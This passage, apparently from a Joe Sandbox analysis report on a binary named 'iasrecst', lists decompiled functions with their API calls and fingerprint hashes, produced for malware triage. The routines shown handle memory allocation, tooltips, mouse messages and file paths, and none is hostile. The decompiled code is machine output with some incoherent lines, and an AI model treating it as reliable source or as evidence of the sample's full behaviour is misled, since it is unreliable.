						} while (_t55 - 0x10 <= _t70);
					}
					_t61 = _t77 + 0xc;
					_t51 = _v8 + 0x1f8;
					_t78 = 1;
					 *((intOrPtr*)(_t51 + 4)) = _t61;
					 *((intOrPtr*)(_t61 + 8)) = _t51;
					_t62 = _t70 + 0xc;
					 *((intOrPtr*)(_t51 + 8)) = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t51;
					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
					_t52 =  *((intOrPtr*)(_t81 + 0x43));
					_t53 = _a4;
					 *((char*)(_t81 + 0x43)) = _t52 + 1;
					if(_t52 == 0) {
						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
					}
					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
					_t54 = _t57;
				} else {
					_t54 = _t49 | 0xffffffff;
				}
				return _t54;
			}

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00407EBE,000000E0,00000000,?,?,?,004063F8), ref: 004081E9

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
Instruction ID: a951a9915c6437c0f42f98627e617b565139ecfdaa8fc563ef3f50a1ca92f44d
Opcode Fuzzy Hash: c10341eec60ebe6bbb32a5452224be3c98b41b110d200c327e5e4d1bcbefa23c
Instruction Fuzzy Hash: FC319A316006068FD314CF18C984BA5BBE0FF50364F2482BED5598B3E2DB74A906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00407333, Relevance: 1.3, APIs: 1, Instructions: 56
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E00407333(signed int _a4, signed int _a8) {
				void* _t8;
				long _t11;
				void* _t13;
				long _t15;
				void* _t17;
				void* _t23;

				_t15 = _a4 * _a8;
				_t11 = _t15;
				if(_t15 <= 0xffffffe0) {
					if(_t15 == 0) {
						_t15 = 1;
					}
					_t15 = _t15 + 0x0000000f & 0xfffffff0;
				}
				while(1) {
					_t13 = 0;
					if(_t15 > 0xffffffe0) {
						goto L8;
					}
					_t23 = _t11 -  *0x436fa8; // 0x3f8
					if(_t23 > 0) {
						L7:
						_t13 = HeapAlloc( *0x43b63c, 8, _t15);
						if(_t13 != 0) {
							L12:
							return _t13;
						}
						goto L8;
					}
					E004079D4(9);
					_push(_t11); // executed
					_t8 = E00407DDE(); // executed
					_t13 = _t8;
					E00407A35(9);
					_t17 = _t17 + 0xc;
					if(_t13 != 0) {
						E00406330(_t13, 0, _t11);
						goto L12;
					}
					goto L7;
					L8:
					if( *0x439d64 == 0) {
						goto L12;
					}
					if(E00407954(_t15) == 0) {
						return 0;
					}
				}
			}

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
Instruction ID: 3f3aad503001cd6b8f63a7fd222fe274e9ba08c9a4469d1d6c832ccce610b396
Opcode Fuzzy Hash: d8ddc1c96428b364bc5c95c0131a8b9d5b49fa79595c9ac96bb98cb66cd96fa8
Instruction Fuzzy Hash: B901F522E086106AF62166296C42B6B22059B807A9F1A0137FE54772D2D6787C01E1EF

Uniqueness

Uniqueness Score: -1.00%

Function 02281820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 0228182F

Memory Dump Source

Source File: 00000001.00000002.496560392.0000000002281000.00000020.00000001.sdmp, Offset: 02281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2281000_iasrecst.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ead46ff0ad7b1ab31aa7048eeb0e346ccaeb0cbd8b71f8a14a8aade0bdf753c3
Instruction ID: 7ffb72f28cf7be5cbab5b7f1d2ab1015669f8d020f8348079450c55e7f797206
Opcode Fuzzy Hash: ead46ff0ad7b1ab31aa7048eeb0e346ccaeb0cbd8b71f8a14a8aade0bdf753c3
Instruction Fuzzy Hash: 01C04C7A55420CAB8B04DFD8EC94DAB37ADBB8CB10B148548FA1D87200C630F9108BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00410E05, Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 343
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00410E05(signed int __ecx) {
				signed int _t116;
				signed int _t119;
				signed int _t120;
				struct HWND__* _t124;
				signed int _t126;
				intOrPtr _t127;
				signed char _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				void* _t160;
				intOrPtr* _t167;
				signed int _t169;
				signed int _t182;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t198;
				void* _t200;
				signed short _t208;
				intOrPtr _t211;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t116 = E00406520(E0042AA5D, _t215);
				_t218 = _t217 - 0x74;
				_t167 =  *((intOrPtr*)(_t215 + 8));
				_t208 =  *(_t167 + 4);
				_t198 = __ecx;
				 *(_t215 - 0x10) = __ecx;
				 *(_t215 - 0x1c) = _t208;
				if(_t208 == 0x200 || _t208 == 0xa0 || _t208 == 0x202 || _t208 == 0x205 || _t208 == 0x208) {
					_t116 = GetKeyState(1);
					if(_t116 < 0) {
						L49:
						_t208 =  *(_t215 - 0x1c);
						goto L50;
					}
					_t116 = GetKeyState(2);
					if(_t116 < 0) {
						goto L49;
					}
					_t116 = GetKeyState(4);
					if(_t116 < 0) {
						goto L49;
					} else {
						_push( *_t167);
						L9:
						_t116 = E00413740(_t215);
						if(_t116 != 0 && ( *(_t116 + 0x24) & 0x00000401) == 0) {
							_push(GetParent( *(_t116 + 0x1c)));
							goto L9;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							_t211 = E00425C92(0x4397cc, E0042440D);
							 *((intOrPtr*)(_t215 - 0x18)) = _t211;
							_t169 =  *(_t211 + 0xcc);
							_t119 = E00414D17(_t198);
							__eflags = _t169;
							 *(_t215 - 0x14) = _t119;
							if(_t169 == 0) {
								L19:
								_t120 = E004131DD(0x58);
								 *(_t215 - 0x1c) = _t120;
								_t169 = 0;
								__eflags = _t120;
								 *(_t215 - 4) = 0;
								if(__eflags != 0) {
									_t169 = E00410AA2(_t120);
								}
								 *(_t215 - 4) =  *(_t215 - 4) | 0xffffffff;
								_push(1);
								_t116 = E00410AF7(_t169, __eflags,  *(_t215 - 0x14));
								__eflags = _t116;
								if(_t116 != 0) {
									SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
									_t198 =  *(_t215 - 0x10);
									 *(_t211 + 0xcc) = _t169;
									L25:
									E00406330(_t215 - 0x54, 0, 0x2c);
									_t124 =  *(_t198 + 0x1c);
									_t220 = _t218 + 0xc;
									 *(_t215 - 0x4c) = _t124;
									 *(_t215 - 0x48) = _t124;
									 *(_t215 - 0x54) = 0x28;
									 *(_t215 - 0x50) = 1;
									_t126 = SendMessageA( *(_t169 + 0x1c), 0x408, 0, _t215 - 0x54);
									__eflags = _t126;
									if(_t126 == 0) {
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
									}
									_t127 =  *((intOrPtr*)(_t215 + 8));
									 *((intOrPtr*)(_t215 - 0x24)) =  *((intOrPtr*)(_t127 + 0x18));
									 *(_t215 - 0x28) =  *(_t127 + 0x14);
									ScreenToClient( *(_t198 + 0x1c), _t215 - 0x28);
									E00406330(_t215 - 0x80, 0, 0x2c);
									_t221 = _t220 + 0xc;
									 *(_t215 - 0x80) = 0x28;
									_t116 =  *((intOrPtr*)( *_t198 + 0x64))( *(_t215 - 0x28),  *((intOrPtr*)(_t215 - 0x24)), _t215 - 0x80);
									 *(_t215 - 0x1c) = _t116;
									asm("sbb ecx, ecx");
									_t182 =  ~(_t116 + 1) & _t198;
									__eflags =  *(_t211 + 0xd4) - _t116;
									 *(_t215 - 0x14) = _t182;
									if( *(_t211 + 0xd4) != _t116) {
										L33:
										__eflags = _t116 - 0xffffffff;
										if(_t116 == 0xffffffff) {
											SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
											L42:
											E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
											__eflags =  *(_t211 + 0xd8) - 0x28;
											_t91 = _t211 + 0xd8; // 0xd8
											_t200 = _t91;
											if( *(_t211 + 0xd8) >= 0x28) {
												SendMessageA( *(_t169 + 0x1c), 0x405, 0, _t200);
											}
											 *(_t211 + 0xd0) =  *(_t215 - 0x14);
											 *(_t211 + 0xd4) =  *(_t215 - 0x1c);
											_t183 = 0xb;
											_t116 = memcpy(_t200, _t215 - 0x80, _t183 << 2);
											goto L45;
										}
										_t186 = 0xb;
										_t141 = memcpy(_t215 - 0x54, _t215 - 0x80, _t186 << 2);
										_t221 = _t221 + 0xc;
										_t188 =  *(_t215 - 0x10);
										 *(_t215 - 0x50) = _t141;
										__eflags =  *(_t188 + 0x24) & 0x00000400;
										if(( *(_t188 + 0x24) & 0x00000400) != 0) {
											_t150 = _t141 | 0x00000020;
											__eflags = _t150;
											 *(_t215 - 0x50) = _t150;
										}
										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
										__eflags =  *(_t215 - 0x79) & 0x00000040;
										if(( *(_t215 - 0x79) & 0x00000040) != 0) {
											L38:
											SendMessageA( *(_t169 + 0x1c), 0x401, 1, 0);
											_t145 =  *(_t215 - 0x10);
											__eflags =  *(_t145 + 0x24) & 0x00000400;
											if(( *(_t145 + 0x24) & 0x00000400) != 0) {
												SendMessageA( *(_t169 + 0x1c), 0x411, 1, _t215 - 0x54);
											}
											SetWindowPos( *(_t169 + 0x1c), 0, 0, 0, 0, 0, 0x213);
											goto L41;
										} else {
											_t149 = E00414D5B( *(_t215 - 0x10));
											__eflags = _t149;
											if(_t149 == 0) {
												L41:
												_t211 =  *((intOrPtr*)(_t215 - 0x18));
												goto L42;
											}
											goto L38;
										}
									} else {
										__eflags =  *(_t211 + 0xd0) - _t182;
										if( *(_t211 + 0xd0) != _t182) {
											goto L33;
										}
										__eflags =  *(_t198 + 0x25) & 0x00000004;
										if(( *(_t198 + 0x25) & 0x00000004) == 0) {
											__eflags = _t116 - 0xffffffff;
											if(_t116 != 0xffffffff) {
												_t116 = E00410D73(_t169,  *((intOrPtr*)(_t215 + 8)));
											}
										} else {
											GetCursorPos(_t215 - 0x20);
											_t116 = SendMessageA( *(_t169 + 0x1c), 0x412, 0, ( *(_t215 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t215 - 0x20) & 0x0000ffff);
										}
										L45:
										__eflags =  *((intOrPtr*)(_t215 - 0x5c)) - 0xffffffff;
										if( *((intOrPtr*)(_t215 - 0x5c)) != 0xffffffff) {
											__eflags =  *(_t215 - 0x60);
											if( *(_t215 - 0x60) == 0) {
												_t116 = E004062E0( *((intOrPtr*)(_t215 - 0x5c)));
											}
										}
										goto L78;
									}
								} else {
									__eflags = _t169;
									if(_t169 != 0) {
										_t116 =  *((intOrPtr*)( *_t169 + 4))(1);
									}
									goto L78;
								}
							}
							_t160 = E00404FFE(_t169);
							__eflags = _t160 -  *(_t215 - 0x14);
							if(_t160 !=  *(_t215 - 0x14)) {
								 *((intOrPtr*)( *_t169 + 0x58))();
								 *((intOrPtr*)( *_t169 + 4))(1);
								_t169 = 0;
								__eflags = 0;
								 *(_t211 + 0xcc) = 0;
							}
							__eflags = _t169;
							if(_t169 != 0) {
								goto L25;
							} else {
								goto L19;
							}
						} else {
							__eflags = _t116;
							if(_t116 == 0) {
								_t116 = E00425C92(0x4397cc, E0042440D);
								 *(_t116 + 0xd0) =  *(_t116 + 0xd0) & 0x00000000;
								 *(_t116 + 0xd4) =  *(_t116 + 0xd4) | 0xffffffff;
							}
							goto L78;
						}
					}
				} else {
					L50:
					__eflags =  *(_t198 + 0x24) & 0x00000401;
					if(( *(_t198 + 0x24) & 0x00000401) == 0) {
						L78:
						 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0xc));
						return _t116;
					}
					_push( *_t167);
					while(1) {
						_t116 = E00413740(_t215);
						__eflags = _t116;
						if(_t116 == 0) {
							break;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							L57:
							__eflags = _t208 - 0x100;
							if(_t208 < 0x100) {
								L59:
								__eflags = _t208 - 0x104;
								if(_t208 < 0x104) {
									L62:
									_t116 = 0;
									__eflags = 0;
									L63:
									__eflags =  *(_t198 + 0x25) & 0x00000004;
									if(( *(_t198 + 0x25) & 0x00000004) != 0) {
										goto L78;
									}
									__eflags = _t116;
									if(_t116 != 0) {
										L77:
										_t116 = E00414026(_t116);
										goto L78;
									}
									__eflags = _t208 - 0x201;
									if(_t208 == 0x201) {
										goto L77;
									}
									__eflags = _t208 - 0x203;
									if(_t208 == 0x203) {
										goto L77;
									}
									__eflags = _t208 - 0x204;
									if(_t208 == 0x204) {
										goto L77;
									}
									__eflags = _t208 - 0x206;
									if(_t208 == 0x206) {
										goto L77;
									}
									__eflags = _t208 - 0x207;
									if(_t208 == 0x207) {
										goto L77;
									}
									__eflags = _t208 - 0x209;
									if(_t208 == 0x209) {
										goto L77;
									}
									__eflags = _t208 - 0xa1;
									if(_t208 == 0xa1) {
										goto L77;
									}
									__eflags = _t208 - 0xa3;
									if(_t208 == 0xa3) {
										goto L77;
									}
									__eflags = _t208 - 0xa4;
									if(_t208 == 0xa4) {
										goto L77;
									}
									__eflags = _t208 - 0xa6;
									if(_t208 == 0xa6) {
										goto L77;
									}
									__eflags = _t208 - 0xa7;
									if(_t208 == 0xa7) {
										goto L77;
									}
									__eflags = _t208 - 0xa9;
									if(_t208 != 0xa9) {
										goto L78;
									}
									goto L77;
								}
								__eflags = _t208 - 0x107;
								if(_t208 > 0x107) {
									goto L62;
								}
								L61:
								_t116 = 1;
								goto L63;
							}
							__eflags = _t208 - 0x108;
							if(_t208 <= 0x108) {
								goto L61;
							}
							goto L59;
						}
						__eflags =  *(_t116 + 0x24) & 0x00000401;
						if(( *(_t116 + 0x24) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t116 + 0x1c)));
					}
					__eflags = _t116 - _t198;
					if(_t116 != _t198) {
						goto L78;
					}
					goto L57;
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00410E0A
GetKeyState.USER32(00000001), ref: 00410E57
GetKeyState.USER32(00000002), ref: 00410E64
GetKeyState.USER32(00000004), ref: 00410E71
GetParent.USER32(?), ref: 00410E92
SendMessageA.USER32 ref: 00410F6C
SendMessageA.USER32 ref: 00410FB0
SendMessageA.USER32 ref: 00410FC8
ScreenToClient.USER32 ref: 00410FE4
GetCursorPos.USER32(?), ref: 0041103B
SendMessageA.USER32 ref: 00411059
SendMessageA.USER32 ref: 004110BB
SendMessageA.USER32 ref: 004110DE
SendMessageA.USER32 ref: 004110FA
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0041110D
SendMessageA.USER32 ref: 00411139
SendMessageA.USER32 ref: 00411187
GetParent.USER32(?), ref: 004111B8

Strings

@, xrefs: 004110C1
(, xrefs: 00410FFF
(, xrefs: 00410F97

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
String ID: ($($@
API String ID: 986702660-2846432479
Opcode ID: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
Instruction ID: 13d5465373c71cfe337dff1ba131fcf840a9d493356aa9c13fb6cf6503e8bb35
Opcode Fuzzy Hash: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
Instruction Fuzzy Hash: 00C1A671A00315ABDF249F94CC85BEEBB75AF08704F10412BEB15BB2E1D7B898C58B59

Uniqueness

Uniqueness Score: -1.00%

Function 00417B29, Relevance: 12.1, APIs: 8, Instructions: 72
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00417B29() {
				CHAR* _t29;
				CHAR* _t36;
				void* _t38;
				CHAR* _t47;
				void* _t53;

				E00406520(E0042A77C, _t53);
				_t47 =  *(_t53 + 8);
				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
					_t29 =  *0x436980; // 0x436994
					 *(_t53 + 8) = _t29;
					_push(_t53 + 8);
					 *(_t53 - 4) = 0;
					E00417BF9(_t53, _t47);
					if(GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0) != 0) {
						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
							CharUpperA(_t47);
						}
						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
							if(_t38 != 0xffffffff) {
								FindClose(_t38);
								lstrcpyA( *(_t53 - 0x14), _t53 - 0x12c);
							}
						}
						_push(1);
						_pop(0);
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E00416AEC(_t53 + 8);
					_t36 = 0;
				} else {
					lstrcpynA(_t47,  *(_t53 + 0xc), 0x104);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t36;
			}

APIs

__EH_prolog.LIBCMT ref: 00417B2E
GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00417B4C
lstrcpynA.KERNEL32(?,?,00000104), ref: 00417B5B
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00417B8F
CharUpperA.USER32(?), ref: 00417BA0
FindFirstFileA.KERNEL32(?,?), ref: 00417BB6
FindClose.KERNEL32(00000000), ref: 00417BC2
lstrcpyA.KERNEL32(?,?), ref: 00417BD2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
String ID:
API String ID: 304730633-0
Opcode ID: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
Instruction ID: d6ea0ce2269d815b5d4983ac84d4510317191ca485f23a24ef5020b763cd6ff7
Opcode Fuzzy Hash: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
Instruction Fuzzy Hash: 71215C71A04119ABCB209F61DC48EEF7F7CEF05768F008166F919E61A0D7349A46CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041E95F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160
keyboardtimeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041E95F(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v36;
				signed char _v65;
				char _v72;
				void* _t58;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr* _t113;

				_t110 = _a4;
				_t113 = __ecx;
				if(E00414007(__ecx, _t110) != 0) {
					L38:
					_t58 = 1;
					return _t58;
				}
				_t111 =  *((intOrPtr*)(_t110 + 4));
				_v20 = E00404FFE(__ecx);
				if(( *(__ecx + 0x64) & 0x00000020) != 0 || _t111 == 0x201 || _t111 == 0x202) {
					if(_t111 < 0x200 || _t111 > 0x209) {
						if(_t111 < 0xa0 || _t111 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E004249C4();
						_t67 = _a4;
						_v28.y =  *((intOrPtr*)(_t67 + 0x18));
						_v28.x =  *(_t67 + 0x14);
						ScreenToClient( *(_t113 + 0x1c),  &_v28);
						E00406330( &_v72, 0, 0x2c);
						_v72 = 0x28;
						_v8 =  *((intOrPtr*)( *_t113 + 0x64))(_v28.x, _v28.y,  &_v72);
						if(_v36 != 0xffffffff) {
							E004062E0(_v36);
						}
						if(_t111 != 0x201 || (_v65 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							if(_t111 != 0x201 && GetKeyState(1) < 0) {
								_v8 =  *((intOrPtr*)(_v16 + 0x104));
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							if(GetKeyState(1) >= 0 || _v12 != 0) {
								 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
								KillTimer( *(_t113 + 0x1c), 0xe001);
							}
							goto L29;
						} else {
							if(_t111 != 0x202) {
								if(( *(_t113 + 0x60) & 0x00000008) != 0 || GetKeyState(1) < 0) {
									 *((intOrPtr*)( *_t113 + 0xdc))(_v8);
								} else {
									if(_v8 ==  *((intOrPtr*)(_v16 + 0x104))) {
										L29:
										 *((intOrPtr*)(_v16 + 0x104)) = _v8;
										goto L30;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E0041E722(_t113);
								}
								goto L29;
							}
							 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L20;
						}
					}
				} else {
					L30:
					_t60 = E00414DCC(_t113);
					if(_t60 == 0 ||  *((intOrPtr*)(_t60 + 0x50)) == 0) {
						if(_v20 == 0) {
							L36:
							return E00415EEB(_a4);
						} else {
							goto L34;
						}
						while(1) {
							L34:
							_t112 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x90))() != 0) {
								goto L38;
							}
							_t64 = E00414C6C(_t112);
							_v20 = _t64;
							if(_t64 != 0) {
								continue;
							}
							goto L36;
						}
						goto L38;
					} else {
						return 0;
					}
				}
			}

APIs

Part of subcall function 00404FFE: GetParent.USER32(?), ref: 00405008

ScreenToClient.USER32 ref: 0041E9E9
GetKeyState.USER32(00000001), ref: 0041EA46
GetKeyState.USER32(00000001), ref: 0041EA98
GetKeyState.USER32(00000001), ref: 0041EACE
KillTimer.USER32(?,0000E001), ref: 0041EAF3

Strings

(, xrefs: 0041EA04

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: State$ClientKillParentScreenTimer
String ID: (
API String ID: 2757461879-3887548279
Opcode ID: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
Instruction ID: 933066e1b9ae1ffc9999b2effe157d6391a28475e321b0032f1d86925bea9953
Opcode Fuzzy Hash: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
Instruction Fuzzy Hash: 09518179A00205DBDF24DB96C488BEE7BB1AF44354F14006AED16A72D1C7B869C2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00422488, Relevance: 10.6, APIs: 7, Instructions: 67
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00422488(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}

APIs

GetKeyState.USER32(00000011), ref: 00422499
GetKeyState.USER32(00000010), ref: 004224A9
GetFocus.USER32(?,?,?,00000098), ref: 004224B9
GetDesktopWindow.USER32 ref: 004224C1
SendMessageA.USER32 ref: 004224E5
SendMessageA.USER32 ref: 00422504
GetParent.USER32(00000000), ref: 0042250D

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageSendState$DesktopFocusParentWindow
String ID:
API String ID: 4150626516-0
Opcode ID: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
Instruction ID: 20f266b1a498cc3956224d16169f9dc1dc704df93882e012ad9005a8c3fefddb
Opcode Fuzzy Hash: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
Instruction Fuzzy Hash: A4110D32B00334BFEB502BA5AD48EAA7798EB14794F904137FE41D7250DBF49C4256E4

Uniqueness

Uniqueness Score: -1.00%

Function 00422473, Relevance: 7.6, APIs: 5, Instructions: 52
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00422473(void* __eax, void* __ebx, void* __edx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t33;
				void* _t40;
				int _t43;
				struct HWND__* _t47;
				void* _t49;

				 *((intOrPtr*)(_t49 + __eax + 0x6a)) =  *((intOrPtr*)(_t49 + __eax + 0x6a)) + __edx;
				 *((intOrPtr*)(__eax - 0x15)) =  *((intOrPtr*)(__eax - 0x15)) + __ebx;
				_push(_t49);
				_push(0x98);
				_push(__ebx);
				_t40 = 0x98;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t47 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t47 != 0) {
					_t43 = _a4 << 0x10;
					do {
						_t33 = SendMessageA(_t47, 0x20a, _t43, _a8);
						_t47 = GetParent(_t47);
					} while (_t33 == 0 && _t47 != 0 && _t47 != _v8);
				} else {
					_t33 = SendMessageA( *(_t40 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t33;
			}

APIs

GetKeyState.USER32(00000011), ref: 00422499
GetKeyState.USER32(00000010), ref: 004224A9
GetFocus.USER32(?,?,?,00000098), ref: 004224B9
GetDesktopWindow.USER32 ref: 004224C1
SendMessageA.USER32 ref: 004224E5

Memory Dump Source

